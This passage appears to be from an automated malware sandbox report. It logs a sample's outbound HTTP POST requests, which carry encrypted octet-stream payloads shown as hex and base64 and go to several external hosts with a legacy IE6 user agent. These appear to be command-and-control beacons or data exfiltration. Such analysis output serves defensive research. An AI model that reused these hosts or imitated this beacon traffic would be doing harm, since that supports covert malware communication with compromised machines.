6d 4c 68 4a 43 32 74 59 55 4c 49 45 67 65 63 6e 62 49 45 67 41 48 62 6f 55 77 73 6d 58 62 48 71 6d 54 37 4e 55 6a 54 48 4d 31 71 56 72 71 2f 6e 77 73 35 44 33 32 64 48 38 42 62 48 6c 4a 38 4b 4c 44 72 74 5a 71 6b 74 4d 4d 73 4b 31 46 56 6a 34 49 37 30 53 68 2b 51 58 64 77 56 52 35 50 61 74 77 46 38 38 70 56 48 6e 56 6f 37 79 59 52 66 58 70 56 76 38 55 6f 76 6e 6c 6a 77 6d 35 42 72 6f 6a 78 4d 68 76 68 54 4c 68 6a 45 2f 4f 74 77 56 31 7a 58 51 4a 31 4e 43 30 76 62 64 74 4c 76 53 55 43 45 36 63 57 4d 78 31 53 4d 6d 34 51 64 78 49 54 67 49 72 58 79 63 38 64 48 5a 75 44 70 70 65 48 6e 37 6d 7a 53 36 63 4f 31 70 47 6c 67 4d 48 6f 59 66 69 35 62 49 61 38 6a 34 73 Data Ascii: GP9j08LOo8alWks9tb8TyEVdMfDSiYloFtkEien1lxpxK2sw5Nll5wnKRN5epk2x4ab8lkhX48VPB0C0Q5oHyviXp0R84qh91FeMipNjdPKGPmr30Dpg9zv2WUwcpvD8ZF9YhQn309pf74HO4pBlyqNcruh+fjhqBrx2tzPypsrrVLOFKl3gsAc7yxoUO4EwcRpzYV+JU9ZB2S9SPeafQ5eRciAZQCyH4oYxKyo3LBcgq9OlxhhIpowNtOvPZn8UadCrTkSHZW/PyzrZGlwl84rikfpoPIsRvWtIvgBvSf8ZZNL6sTBbLrQI9kNDFjMqrebLEVlU+O0sd4sLWDPT7W8zxPTN/v41u6O7lnmLhJC2tYULIEgecnbIEgAHboUwsmXbHqmT7NUjTHM1qVrq/nws5D32dH8BbHlJ8KLDrtZqktMMsK1FVj4I70Sh+QXdwVR5PatwF88pVHnVo7yYRfXpVv8Uovnljwm5BrojxMhvhTLhjE/OtwV1zXQJ1NC0vbdtLvSUCE6cWMx1SMm4QdxITgIrXyc8dHZuDppeHn7mzS6cO1pGlgMHoYfi5bIa8j4s
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.2print.comCache-Control: no-cacheData Raw: 57 46 41 48 61 63 47 71 71 4d 59 6c 32 61 6f 64 6f 49 58 68 4d 35 6f 38 50 72 73 2f 69 36 79 6f 68 5a 58 50 34 4a 35 52 54 6a 6b 42 54 6a 34 58 2b 6d 7a 5a 4e 34 58 61 68 56 77 77 35 55 69 51 56 57 2b 72 77 58 4a 30 37 6a 55 47 33 46 63 37 31 31 58 75 42 6a 56 56 68 56 37 7a 34 35 4c 4d 32 49 78 4c 6f 33 79 2b 41 38 4e 37 33 71 45 2f 62 66 55 44 68 45 49 59 4c 6e 75 53 64 63 56 30 37 44 66 6a 33 69 76 75 65 49 5a 47 76 38 31 61 69 36 50 71 5a 71 6d 52 69 75 4c 63 65 55 6d 48 63 56 34 51 77 47 43 43 79 7a 65 48 66 41 77 54 53 39 4f 44 50 72 34 4f 30 35 6b 77 59 47 45 6d 79 46 39 46 44 62 4c 77 64 35 36 54 35 75 56 6c 64 57 52 32 59 4d 75 57 4f 53 53 39 41 31 44 6b 62 75 58 42 74 62 46 63 35 5a 74 35 6e 61 35 62 50 4f 41 63 4c 58 50 6f 59 6b 6e 41 43 4d 51 2b 55 51 39 72 43 2b 7a 67 36 59 6d 66 6b 42 4f 43 30 4b 4d 4a 2f 47 4a 71 4f 50 4f 48 6b 7a 71 37 4e 4a 55 6a 7a 76 77 2f 55 4e 47 34 2b 59 4e 2f 64 6d 73 63 31 6b 64 36 56 62 45 6c 74 43 57 6e 70 4f 72 78 32 5a 6d 48 65 70 55 50 74 6b 36 6c 59 68 31 55 64 6d 69 31 62 47 6b 79 51 50 63 6c 64 47 4b 52 58 65 38 45 4f 53 69 31 5a 71 51 37 62 62 64 33 6c 4e 2b 6d 37 68 54 2f 55 54 79 2f 53 4b 4f 42 75 76 41 34 2b 75 62 33 38 76 33 47 45 47 6c 6a 6d 32 52 46 6a 66 67 70 52 59 70 61 7a 56 77 34 37 38 2f 6f 4a 36 50 37 2b 42 52 76 4d 6f 55 2b 51 50 51 74 5a 45 62 63 2b 41 59 4d 77 5a 68 42 31 35 70 62 56 6d 74 31 62 34 32 6d 73 4b 73 7a 61 65 71 5a 6f 53 33 35 6b 63 54 68 76 62 44 4e 36 6d 33 6c 6b 70 6c 58 56 39 74 4e 51 42 47 4f 35 2b 65 45 42 44 39 34 7a 53 41 57 42 4e 4f 74 41 4c 55 59 70 42 34 54 6d 45 62 45 35 51 72 4b 31 37 45 3d Data Ascii: WFAHacGqqMYl2aodoIXhM5o8Prs/i6yohZXP4J5RTjkBTj4X+mzZN4XahVww5UiQVW+rwXJ07jUG3Fc711XuBjVVhV7z45LM2IxLo3y+A8N73qE/bfUDhEIYLnuSdcV07Dfj3ivueIZGv81ai6PqZqmRiuLceUmHcV4QwGCCyzeHfAwTS9ODPr4O05kwYGEmyF9FDbLwd56T5uVldWR2YMuWOSS9A1DkbuXBtbFc5Zt5na5bPOAcLXPoYknACMQ+UQ9rC+zg6YmfkBOC0KMJ/GJqOPOHkzq7NJUjzvw/UNG4+YN/dmsc1kd6VbEltCWnpOrx2ZmHepUPtk6lYh1Udmi1bGkyQPcldGKRXe8EOSi1ZqQ7bbd3lN+m7hT/UTy/SKOBuvA4+ub38v3GEGljm2RFjfgpRYpazVw478/oJ6P7+BRvMoU+QPQtZEbc+AYMwZhB15pbVmt1b42msKszaeqZoS35kcThvbDN6m3lkplXV9tNQBGO5+eEBD94zSAWBNOtALUYpB4TmEbE5QrK17E=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 46 6c 53 2b 54 6b 57 50 68 73 59 51 42 43 5a 55 62 4c 63 57 37 4c 36 4c 75 54 73 54 5a 47 53 6c 53 52 67 55 72 61 79 77 77 6f 49 48 73 6b 61 41 6b 74 36 4b 4c 45 62 6c 77 6e 4f 74 37 32 6b 69 67 31 6b 53 42 61 2b 68 55 79 30 64 74 6a 6c 42 6c 69 71 31 58 48 46 39 51 2f 63 49 39 49 53 33 73 36 53 64 78 2b 74 77 35 32 63 47 71 62 48 78 61 4a 53 42 52 7a 2b 77 6b 59 37 43 69 35 38 78 53 30 47 6f 34 2b 38 4c 42 46 61 63 49 30 38 2f 43 35 41 6b 70 73 74 50 56 70 2b 4b 72 76 53 6f 57 61 2b 70 6e 5a 55 73 57 66 61 46 68 55 4e 75 5a 68 73 4e 39 6b 6a 43 6a 72 72 4b 65 6d 62 6a 66 6f 4d 36 47 4d 7a 78 37 4a 6b 76 71 41 6b 6f 55 75 52 6c 59 59 62 56 46 34 6e 4c 67 34 42 48 54 6f 72 6d 36 30 76 64 37 4e 42 77 46 79 6b 38 35 7a 59 41 4b 37 2f 42 59 4a 6a 4e 36 36 75 78 77 34 39 63 4d 4c 30 57 33 46 6d 76 53 79 6b 58 31 67 6c 78 4b 6b 30 56 53 65 5a 70 6c 30 55 79 50 78 59 4e 4a 41 55 54 49 6b 61 74 2b 78 4e 58 71 78 76 54 39 7a 30 56 53 57 78 69 64 75 42 65 31 49 4a 65 30 61 6f 4f 4b 38 78 78 4b 41 71 2b 2f 71 33 4e 62 50 50 52 79 35 4e 4f 2f 6e 47 52 45 62 57 59 64 79 76 6e 77 76 2f 53 6a 66 47 77 52 5a 36 41 33 54 4d 78 42 6d 44 46 56 6c 48 5a 31 36 6e 53 35 33 6e 35 42 41 75 73 41 6d 4c 6b 64 74 64 70 55 53 78 77 78 61 46 51 69 45 39 48 44 64 38 66 62 6e 4f 6a 7a 65 30 75 6e 31 4e 6f 79 46 49 4d 71 33 77 57 4c 58 76 77 76 67 55 4b 53 48 2b 2f 68 49 4a 66 4d 34 2f 31 36 48 6b 59 6d 4d 64 74 6a 53 6d 79 50 2f 2f 37 31 67 54 65 4d 35 38 6d 49 52 32 44 72 56 69 6e 6a 6e 66 6a 47 44 33 51 76 4b 38 6d 41 7a 74 69 34 44 52 64 65 61 62 4b 42 4f 4f 58 30 6f 35 2f 6e 37 49 61 59 61 46 50 47 38 38 67 32 67 39 69 58 71 6b 47 66 50 4d 38 51 4e 62 5a 68 59 6a 7a 68 4c 58 42 72 46 72 2b 63 51 6f 57 7a 55 31 68 33 56 66 5a 37 6a 4b 43 55 72 57 75 72 41 3d 3d Data Ascii: FlS+TkWPhsYQBCZUbLcW7L6LuTsTZGSlSRgUraywwoIHskaAkt6KLEblwnOt72kig1kSBa+hUy0dtjlBliq1XHF9Q/cI9IS3s6Sdx+tw52cGqbHxaJSBRz+wkY7Ci58xS0Go4+8LBFacI08/C5AkpstPVp+KrvSoWa+pnZUsWfaFhUNuZhsN9kjCjrrKembjfoM6GMzx7JkvqAkoUuRlYYbVF4nLg4BHTorm60vd7NBwFyk85zYAK7/BYJjN66uxw49cML0W3FmvSykX1glxKk0VSeZpl0UyPxYNJAUTIkat+xNXqxvT9z0VSWxiduBe1IJe0aoOK8xxKAq+/q3NbPPRy5NO/nGREbWYdyvnwv/SjfGwRZ6A3TMxBmDFVlHZ16nS53n5BAusAmLkdtdpUSxwxaFQiE9HDd8fbnOjze0un1NoyFIMq3wWLXvwvgUKSH+/hIJfM4/16HkYmMdtjSmyP//71gTeM58mIR2DrVinjnfjGD3QvK8mAzti4DRdeabKBOOX0o5/n7IaYaFPG88g2g9iXqkGfPM8QNbZhYjzhLXBrFr+cQoWzU1h3VfZ7jKCUrWurA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 51 32 72 4f 47 56 31 6f 72 73 62 33 61 76 33 78 6c 45 37 30 41 5a 5a 34 54 45 30 4c 50 2b 69 61 34 66 37 6a 4c 50 57 4d 7a 78 36 51 47 43 34 74 4c 41 4c 2f 43 51 73 4c 44 35 44 4d 63 62 49 53 6e 31 6b 56 77 76 30 43 69 47 41 49 62 77 72 57 43 52 36 63 2f 72 69 70 57 33 76 71 43 72 44 44 37 78 52 52 52 55 4f 62 74 45 4d 64 41 70 68 7a 79 47 78 49 73 56 74 42 47 63 70 47 34 70 73 6d 79 71 4f 48 5a 52 61 69 4e 46 58 57 72 78 5a 44 43 6c 71 50 72 31 44 45 53 5a 72 65 54 4a 6b 77 6f 72 2f 45 49 2f 52 4f 79 39 65 4a 57 67 2b 43 33 78 4e 70 31 47 78 76 55 42 57 56 5a 52 6e 58 4c 77 77 4f 56 57 4d 78 52 70 78 51 6b 61 4b 67 58 71 76 4c 61 30 45 43 42 4e 39 74 78 58 31 35 72 6d 51 77 6f 53 30 71 2f 71 61 55 70 33 78 35 76 32 6a 45 78 4d 56 58 30 31 4b 42 39 72 2f 37 2b 69 57 58 36 6e 35 55 4f 4e 59 58 56 72 6b 76 6d 54 75 35 56 43 6e 36 46 55 63 61 43 6a 44 6d 30 73 67 69 2f 6a 6a 32 33 65 5a 33 57 47 30 75 4f 30 69 54 6b 6f 45 74 56 37 4e 46 6b 70 4c 4b 63 69 51 42 67 77 6b 32 43 50 54 4d 33 35 4d 73 71 62 36 50 76 54 4c 6a 6f 61 56 4a 50 49 59 4b 64 4d 52 50 32 4d 64 7a 71 38 55 4c 6e 35 61 6a 6d 73 70 43 58 66 32 6a 46 36 53 43 31 6c 58 46 50 57 6c 46 76 42 6a 59 6d 55 78 73 4b 31 66 39 39 58 62 68 2b 58 36 6f 6f 72 65 43 74 69 53 6a 62 56 6b 4f 49 4d 4d 6d 4d 74 68 4a 64 78 33 6d 39 6e 4b 67 4b 73 4d 56 41 33 47 58 42 7a 30 41 4b 52 6c 52 78 6f 47 64 50 66 56 45 37 57 77 64 65 46 6a 6a 5a 69 5a 52 7a 55 42 68 34 4f 70 62 4d 68 58 58 58 37 4c 42 4d 7a 31 46 31 4a 78 75 4f 47 4c 76 73 4b 4b 30 46 65 51 71 32 46 2b 6f 45 37 44 6a 49 56 6a 30 54 62 43 58 76 43 6c 63 71 6a 6f 77 56 55 62 79 39 34 39 39 6d 58 30 3d Data Ascii: Q2rOGV1orsb3av3xlE70AZZ4TE0LP+ia4f7jLPWMzx6QGC4tLAL/CQsLD5DMcbISn1kVwv0CiGAIbwrWCR6c/ripW3vqCrDD7xRRRUObtEMdAphzyGxIsVtBGcpG4psmyqOHZRaiNFXWrxZDClqPr1DESZreTJkwor/EI/ROy9eJWg+C3xNp1GxvUBWVZRnXLwwOVWMxRpxQkaKgXqvLa0ECBN9txX15rmQwoS0q/qaUp3x5v2jExMVX01KB9r/7+iWX6n5UONYXVrkvmTu5VCn6FUcaCjDm0sgi/jj23eZ3WG0uO0iTkoEtV7NFkpLKciQBgwk2CPTM35Msqb6PvTLjoaVJPIYKdMRP2Mdzq8ULn5ajmspCXf2jF6SC1lXFPWlFvBjYmUxsK1f99Xbh+X6ooreCtiSjbVkOIMMmMthJdx3m9nKgKsMVA3GXBz0AKRlRxoGdPfVE7WwdeFjjZiZRzUBh4OpbMhXXX7LBMz1F1JxuOGLvsKK0FeQq2F+oE7DjIVj0TbCXvClcqjowVUby9499mX0=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 65 36 68 49 47 51 56 6b 72 73 62 2b 4d 74 5a 44 4c 41 57 68 6b 33 37 2b 65 58 44 54 4e 36 49 31 43 64 6c 64 41 2f 71 71 4e 4c 51 78 34 36 6d 63 67 61 6b 6c 46 48 6e 59 4c 6f 59 59 4d 74 4e 31 43 43 4a 78 75 73 36 66 63 56 61 36 5a 74 35 74 4b 48 54 6a 50 39 34 47 32 4d 34 64 6b 32 72 58 66 4b 63 54 33 30 38 66 44 4c 54 70 4d 4f 6e 55 54 30 4f 76 65 4a 56 50 73 6b 36 61 68 53 72 48 67 52 71 39 4e 39 6b 54 65 33 57 30 41 67 35 68 6e 71 4e 58 77 32 73 59 4e 54 33 6a 73 67 41 54 69 77 66 57 6f 32 45 62 77 76 2f 49 58 35 41 48 75 4d 6d 43 57 32 61 78 56 63 63 37 69 6a 63 73 67 76 6d 6f 33 4a 54 4b 56 33 54 65 75 33 51 39 41 71 49 4b 51 4d 65 2f 46 78 6b 47 74 41 65 39 36 61 4f 6d 78 66 45 38 59 55 52 50 59 4f 41 4e 44 44 7a 6b 65 70 73 7a 44 7a 58 4c 39 73 67 4d 2f 63 4f 41 6e 6e 72 6b 30 6d 47 53 4b 67 33 72 43 71 77 65 4f 39 64 65 71 48 73 74 4b 58 5a 37 6b 32 4e 51 65 48 38 4f 6b 55 61 6c 4f 62 74 54 43 49 42 76 77 39 5a 45 75 7a 6a 73 6f 70 44 37 6e 7a 68 6c 38 72 63 75 56 4e 6b 56 66 57 6c 34 62 72 6f 6c 71 4b 69 4a 55 4c 2f 44 73 56 79 36 35 67 6a 79 6e 4b 71 72 53 41 76 6b 50 36 37 78 37 61 35 50 70 50 67 6d 6f 65 4e 5a 35 6a 35 6f 56 47 43 65 31 64 4e 73 54 31 6f 57 4e 4a 75 6d 36 49 47 68 47 76 2f 44 4b 49 39 63 4e 35 31 30 32 66 6d 51 48 31 72 6b 52 34 52 36 46 4b 69 78 47 56 51 31 48 48 48 4d 42 4c 7a 74 58 6c 70 6f 56 74 71 66 6b 54 41 49 4e 76 41 43 72 31 71 43 67 78 63 70 2b 59 50 30 39 4f 36 75 34 43 41 6c 52 32 69 68 44 33 65 6d 72 37 6b 53 6e 42 58 71 70 58 32 43 31 7a 4d 35 56 2f 70 78 33 74 64 74 6c 41 46 79 4d 39 68 6b 51 31 38 7a 70 37 59 4b 62 37 48 33 32 37 71 56 4b 4e 6b 51 6a 46 79 79 79 4a 30 4d 6e 57 54 49 49 78 52 62 30 6e 48 50 68 4d 46 69 4d 6f 76 48 66 36 51 50 6c 2b 4f 38 75 35 45 3d Data Ascii: e6hIGQVkrsb+MtZDLAWhk37+eXDTN6I1CdldA/qqNLQx46mcgaklFHnYLoYYMtN1CCJxus6fcVa6Zt5tKHTjP94G2M4dk2rXfKcT308fDLTpMOnUT0OveJVPsk6ahSrHgRq9N9kTe3W0Ag5hnqNXw2sYNT3jsgATiwfWo2Ebwv/IX5AHuMmCW2axVcc7ijcsgvmo3JTKV3Teu3Q9AqIKQMe/FxkGtAe96aOmxfE8YURPYOANDDzkepszDzXL9sgM/cOAnnrk0mGSKg3rCqweO9deqHstKXZ7k2NQeH8OkUalObtTCIBvw9ZEuzjsopD7nzhl8rcuVNkVfWl4brolqKiJUL/DsVy65gjynKqrSAvkP67x7a5PpPgmoeNZ5j5oVGCe1dNsT1oWNJum6IGhGv/DKI9cN5102fmQH1rkR4R6FKixGVQ1HHHMBLztXlpoVtqfkTAINvACr1qCgxcp+YP09O6u4CAlR2ihD3emr7kSnBXqpX2C1zM5V/px3tdtlAFyM9hkQ18zp7YKb7H327qVKNkQjFyyyJ0MnWTIIxRb0nHPhMFiMovHf6QPl+O8u5E=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 55 49 79 6a 74 53 50 49 75 38 61 30 7a 2b 7a 59 71 67 38 68 73 55 7a 65 32 2b 46 4a 75 65 54 52 42 2b 42 34 67 43 51 47 79 4d 49 65 45 61 38 6a 54 31 68 35 71 50 59 39 57 64 45 62 63 53 4b 66 46 38 6c 32 2b 72 6e 64 49 47 33 39 4d 30 2f 44 56 61 79 6f 37 70 2b 75 6b 79 6b 42 35 67 66 61 79 38 30 47 67 65 2f 66 68 53 50 57 6e 47 35 79 50 59 6e 35 36 55 31 6e 4e 78 67 39 38 2b 41 50 32 44 6b 4a 48 50 35 48 6e 6c 66 34 41 48 64 62 43 59 63 34 63 35 33 6c 79 71 47 53 6c 4d 6b 2b 36 61 36 76 4e 46 41 39 6b 55 44 73 71 6f 50 43 33 48 4f 74 45 4e 49 77 37 55 34 4f 42 6c 54 2f 55 4d 58 65 66 42 49 45 32 51 32 4d 7a 64 4e 6f 6b 47 2b 6c 41 74 6d 72 47 6f 78 66 58 73 6d 77 30 6c 6b 45 4f 4e 64 70 48 39 76 4f 58 72 48 50 43 54 72 48 2b 61 42 57 68 4a 62 4e 50 4f 75 37 6b 75 75 52 31 65 39 6d 4b 71 66 6e 4d 64 57 74 62 71 7a 44 53 37 62 53 59 79 54 6e 61 52 73 49 59 72 35 66 42 62 6f 43 4e 36 34 63 2b 55 48 52 62 35 52 38 65 32 4f 45 79 49 58 69 2f 45 4a 34 76 39 36 73 36 44 4d 70 61 43 2b 59 65 46 2f 79 52 6b 47 6d 61 44 6c 33 53 35 51 63 70 41 64 74 63 41 78 33 61 53 61 2b 74 32 49 66 55 47 5a 7a 7a 6e 31 54 6c 55 41 73 63 6b 4b 48 73 76 72 72 6f 39 6c 41 48 30 30 64 6f 46 55 55 42 38 32 36 73 45 42 65 59 6b 6a 59 58 56 6c 46 53 41 70 6f 41 37 69 33 4d 70 6a 6f 54 56 2f 62 72 49 53 73 47 30 73 79 53 65 79 38 65 6e 47 64 2f 65 50 48 42 62 78 4e 42 34 6d 33 45 43 57 4e 39 32 4d 30 33 77 6f 51 33 76 58 79 44 52 63 31 6e 30 49 64 51 66 4f 51 6d 4a 36 6e 36 69 64 4e 4e 43 4d 41 2f 46 36 2b 4d 51 30 6b 77 43 4b 68 49 6d 6b 74 57 50 56 39 67 7a 6c 35 39 66 31 77 77 6b 6a 54 32 47 56 59 30 70 62 51 39 56 49 4d 61 6a 48 64 70 49 72 74 Data Ascii: UIyjtSPIu8a0z+zYqg8hsUze2+FJueTRB+B4gCQGyMIeEa8jT1h5qPY9WdEbcSKfF8l2+rndIG39M0/DVayo7p+ukykB5gfay80Gge/fhSPWnG5yPYn56U1nNxg98+AP2DkJHP5Hnlf4AHdbCYc4c53lyqGSlMk+6a6vNFA9kUDsqoPC3HOtENIw7U4OBlT/UMXefBIE2Q2MzdNokG+lAtmrGoxfXsmw0lkEONdpH9vOXrHPCTrH+aBWhJbNPOu7kuuR1e9mKqfnMdWtbqzDS7bSYyTnaRsIYr5fBboCN64c+UHRb5R8e2OEyIXi/EJ4v96s6DMpaC+YeF/yRkGmaDl3S5QcpAdtcAx3aSa+t2IfUGZzzn1TlUAsckKHsvrro9lAH00doFUUB826sEBeYkjYXVlFSApoA7i3MpjoTV/brISsG0sySey8enGd/ePHBbxNB4m3ECWN92M03woQ3vXyDRc1n0IdQfOQmJ6n6idNNCMA/F6+MQ0kwCKhImktWPV9gzl59f1wwkjT2GVY0pbQ9VIMajHdpIrt
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.x0c.comCache-Control: no-cacheData Raw: 6e 4d 35 74 76 34 63 5a 76 4d 61 32 2f 58 78 56 74 67 6c 58 78 46 43 46 4d 63 6c 39 63 4d 5a 6d 71 7a 31 62 78 76 71 43 78 55 70 34 4f 36 44 4d 64 74 77 70 76 55 36 66 50 53 54 77 4d 46 31 6c 69 50 48 62 2b 71 33 78 41 42 6c 52 2b 51 74 55 59 37 47 64 45 4c 50 6c 66 57 39 43 6b 62 6f 76 42 66 4e 4d 53 57 2b 45 68 4a 56 59 6d 44 47 51 74 33 58 4d 69 55 72 47 42 46 54 57 6a 61 71 37 2f 79 48 4c 54 6a 41 69 4d 51 68 51 4c 2b 61 43 41 6d 44 2f 78 53 48 49 6f 65 51 63 77 4e 31 2f 47 2f 30 52 46 38 50 61 49 4b 67 6b 4a 37 35 30 78 58 6c 67 77 78 76 71 43 71 6b 44 56 51 49 37 6c 44 36 55 55 45 54 65 6d 58 37 6c 44 62 6c 4b 54 6b 44 4e 75 6a 79 36 64 35 35 2f 6f 2f 45 38 69 6c 67 68 50 72 57 5a 4b 63 46 61 64 68 76 7a 5a 4b 45 31 71 7a 6a 37 64 56 53 72 6a 53 48 2b 37 5a 4c 36 65 6d 62 68 69 55 62 44 63 4d 32 2f 45 64 56 75 72 76 6e 73 72 70 72 70 69 41 68 79 36 39 4b 65 63 66 79 43 4c 33 6b 72 34 76 54 74 66 73 59 49 59 69 4e 63 54 43 75 53 48 51 75 70 43 48 38 65 43 43 58 63 47 70 46 31 58 43 57 43 33 48 46 48 6b 74 46 4a 37 49 4b 4a 33 36 76 31 73 33 77 43 58 4c 57 6b 47 4e 75 57 5a 4f 53 49 48 6d 36 47 43 6a 71 62 62 76 38 66 4f 4e 74 6b 65 46 51 4b 66 59 34 61 51 66 31 67 76 59 76 73 66 6b 4b 78 71 70 54 56 55 5a 44 75 78 71 4d 34 55 6b 49 37 77 4b 7a 75 7a 39 69 49 39 68 38 34 59 67 36 61 56 32 6a 4a 6f 74 52 37 37 66 35 6a 4d 76 57 48 4c 67 52 50 70 33 73 37 47 6d 46 4f 71 7a 4f 76 59 31 56 61 39 43 61 79 66 49 4e 47 31 4a 56 76 6f 52 34 69 6b 32 33 78 79 35 30 43 56 56 42 61 52 6f 4f 68 38 71 72 41 79 57 53 62 32 39 48 46 46 6a 71 78 34 39 33 71 6d 64 63 66 34 2b 4a 67 48 76 2b 55 45 76 6c 2b 42 51 77 2b 68 44 4e 49 74 49 59 4d 70 51 41 66 78 61 52 51 37 47 30 33 2b 65 6d 6f 5a 43 4e 4c 7a 45 64 6e 67 45 34 3d Data Ascii: nM5tv4cZvMa2/XxVtglXxFCFMcl9cMZmqz1bxvqCxUp4O6DMdtwpvU6fPSTwMF1liPHb+q3xABlR+QtUY7GdELPlfW9CkbovBfNMSW+EhJVYmDGQt3XMiUrGBFTWjaq7/yHLTjAiMQhQL+aCAmD/xSHIoeQcwN1/G/0RF8PaIKgkJ750xXlgwxvqCqkDVQI7lD6UUETemX7lDblKTkDNujy6d55/o/E8ilghPrWZKcFadhvzZKE1qzj7dVSrjSH+7ZL6embhiUbDcM2/EdVurvnsrprpiAhy69KecfyCL3kr4vTtfsYIYiNcTCuSHQupCH8eCCXcGpF1XCWC3HFHktFJ7IKJ36v1s3wCXLWkGNuWZOSIHm6GCjqbbv8fONtkeFQKfY4aQf1gvYvsfkKxqpTVUZDuxqM4UkI7wKzuz9iI9h84Yg6aV2jJotR77f5jMvWHLgRPp3s7GmFOqzOvY1Va9CayfING1JVvoR4ik23xy50CVVBaRoOh8qrAyWSb29HFFjqx493qmdcf4+JgHv+UEvl+BQw+hDNItIYMpQAfxaRQ7G03+emoZCNLzEdngE4=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 65 36 68 49 47 51 56 6b 72 73 62 2b 4d 74 5a 44 4c 41 57 68 6b 33 37 2b 65 58 44 54 4e 36 49 31 43 64 6c 64 41 2f 71 71 4e 4c 51 78 34 36 6d 63 67 61 6b 6c 46 48 6e 59 4c 6f 59 59 4d 74 4e 31 43 43 4a 78 75 73 36 66 63 56 61 36 5a 74 35 74 4b 48 54 6a 50 39 34 47 32 4d 34 64 6b 32 72 58 66 4b 63 54 33 30 38 66 44 4c 54 70 4d 4f 6e 55 54 30 4f 76 65 4a 56 50 73 6b 36 61 68 53 72 48 67 52 71 39 4e 39 6b 54 65 33 57 30 41 67 35 68 6e 71 4e 58 77 32 73 59 4e 54 33 6a 73 67 41 54 69 77 66 57 6f 32 45 62 77 76 2f 49 58 35 41 48 75 4d 6d 43 57 32 61 78 56 63 63 37 69 6a 63 73 67 76 6d 6f 33 4a 54 4b 56 33 54 65 75 33 51 39 41 71 49 4b 51 4d 65 2f 46 78 6b 47 74 41 65 39 36 61 4f 6d 78 66 45 38 59 55 52 50 59 4f 41 4e 44 44 7a 6b 65 70 73 7a 44 7a 58 4c 39 73 67 4d 2f 63 4f 41 6e 6e 72 6b 30 6d 47 53 4b 67 33 72 43 71 77 65 4f 39 64 65 71 48 73 74 4b 58 5a 37 6b 32 4e 51 65 48 38 4f 6b 55 61 6c 4f 62 74 54 43 49 42 76 77 39 5a 45 75 7a 6a 73 6f 70 44 37 6e 7a 68 6c 38 72 63 75 56 4e 6b 56 66 57 6c 34 62 72 6f 6c 71 4b 69 4a 55 4c 2f 44 73 56 79 36 35 67 6a 79 6e 4b 71 72 53 41 76 6b 50 36 37 78 37 61 35 50 70 50 67 6d 6f 65 4e 5a 35 6a 35 6f 56 47 43 65 31 64 4e 73 54 31 6f 57 4e 4a 75 6d 36 49 47 68 47 76 2f 44 4b 49 39 63 4e 35 31 30 32 66 6d 51 48 31 72 6b 52 34 52 36 46 4b 69 78 47 56 51 31 48 48 48 4d 42 4c 7a 74 58 6c 70 6f 56 74 71 66 6b 54 41 49 4e 76 41 43 72 31 71 43 67 78 63 70 2b 59 50 30 39 4f 36 75 34 43 41 6c 52 32 69 68 44 33 65 6d 72 37 6b 53 6e 42 58 71 70 58 32 43 31 7a 4d 35 56 2f 70 78 33 74 64 74 6c 41 46 79 4d 39 68 6b 51 31 38 7a 70 37 59 4b 62 37 48 33 32 37 71 56 4b 4e 6b 51 6a 46 79 79 79 4a 30 4d 6e 57 54 49 49 78 52 62 30 6e 48 50 68 4d 46 69 4d 6f 76 48 66 36 51 50 6c 2b 4f 38 75 35 45 3d Data Ascii: e6hIGQVkrsb+MtZDLAWhk37+eXDTN6I1CdldA/qqNLQx46mcgaklFHnYLoYYMtN1CCJxus6fcVa6Zt5tKHTjP94G2M4dk2rXfKcT308fDLTpMOnUT0OveJVPsk6ahSrHgRq9N9kTe3W0Ag5hnqNXw2sYNT3jsgATiwfWo2Ebwv/IX5AHuMmCW2axVcc7ijcsgvmo3JTKV3Teu3Q9AqIKQMe/FxkGtAe96aOmxfE8YURPYOANDDzkepszDzXL9sgM/cOAnnrk0mGSKg3rCqweO9deqHstKXZ7k2NQeH8OkUalObtTCIBvw9ZEuzjsopD7nzhl8rcuVNkVfWl4brolqKiJUL/DsVy65gjynKqrSAvkP67x7a5PpPgmoeNZ5j5oVGCe1dNsT1oWNJum6IGhGv/DKI9cN5102fmQH1rkR4R6FKixGVQ1HHHMBLztXlpoVtqfkTAINvACr1qCgxcp+YP09O6u4CAlR2ihD3emr7kSnBXqpX2C1zM5V/px3tdtlAFyM9hkQ18zp7YKb7H327qVKNkQjFyyyJ0MnWTIIxRb0nHPhMFiMovHf6QPl+O8u5E=
